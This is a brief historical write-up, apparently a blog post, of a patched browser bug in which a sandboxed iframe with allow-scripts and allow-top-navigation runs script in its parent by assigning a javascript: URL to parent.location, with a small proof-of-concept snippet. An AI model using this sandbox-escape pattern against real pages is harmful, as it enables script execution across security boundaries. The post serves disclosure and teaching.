When an iframe was sandboxed with allow-scripts and allow-top-navigation, assigning a javascript: URL to parent.location was permitted — executing code in the parent’s context. Interestingly, alert(parent.location) was correctly blocked with a permission denied error, but the assignment parent.location = "javascript:..." was not.

<!-- sandboxed iframe with allow-top-navigation -->
<iframe sandbox="allow-scripts allow-top-navigation" src="sandboxed.html"></iframe>
<!-- sandboxed.html -->
<script>
// Blocked (expected):
// alert(parent.location);

// Allowed (bypass):
parent.location = "javascript:alert(parent.location)";
</script>

The inconsistency was notable: direct property reads on parent.location were denied, but writes using a javascript: protocol URI were not. This was a narrower case compared to the cross-domain iframe situation where both operations were correctly blocked.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.